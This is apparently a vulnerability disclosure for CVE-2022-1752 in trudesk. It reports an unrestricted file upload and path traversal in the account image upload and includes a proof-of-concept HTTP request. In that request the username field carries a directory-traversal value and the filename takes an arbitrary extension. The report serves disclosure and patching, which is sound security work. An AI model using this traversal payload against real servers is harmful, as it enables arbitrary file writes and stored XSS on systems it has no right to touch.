CVE-2022-1752: Unrestricted File Upload and Path Traversal in upload image in trudesk

Description

The uploadImage function in accountsController take file path and extension from users . An attacker can change the path and extension to upload dangerous file to anywhere in server.

Proof of Concept

1. Login 
2. Upload profile image
3. Capture request, modify `username` and `filename`


POST /accounts/uploadImage HTTP/1.1
Host: 192.168.20.132:8118
Content-Length: 452
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQXoDBooqQ26crHR0
Origin: http://192.168.20.132:8118
Referer: http://192.168.20.132:8118/accounts
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: connect.sid=s%3A01nLIvLiz-oEhbSpekE9nwUSl9R_PQF1.GeCCIcToZnO%2BDlTis77aXBlVGyVOaQDURoUrIcrXQ%2BM; $trudesk%3Atimezone=America/New_York
Connection: close

------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="username"

/../../../../../../testpathtravesal1
------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="_id"

627ce4cd7778b2c5b5f49851
------WebKitFormBoundaryQXoDBooqQ26crHR0
Content-Disposition: form-data; name="image"; filename="filename.anything"
Content-Type: image/jpeg

<image content>
------WebKitFormBoundaryQXoDBooqQ26crHR0--

Impact

Authenticated user can upload dangerous file to anywhere in server (example: upload a file with .html extension lead to stored xss)

Occurrences

accounts.js L485-L505

This function take object.username into join.path() lead to path traversal, take path.extname(filename) lead to upload file with dangerous type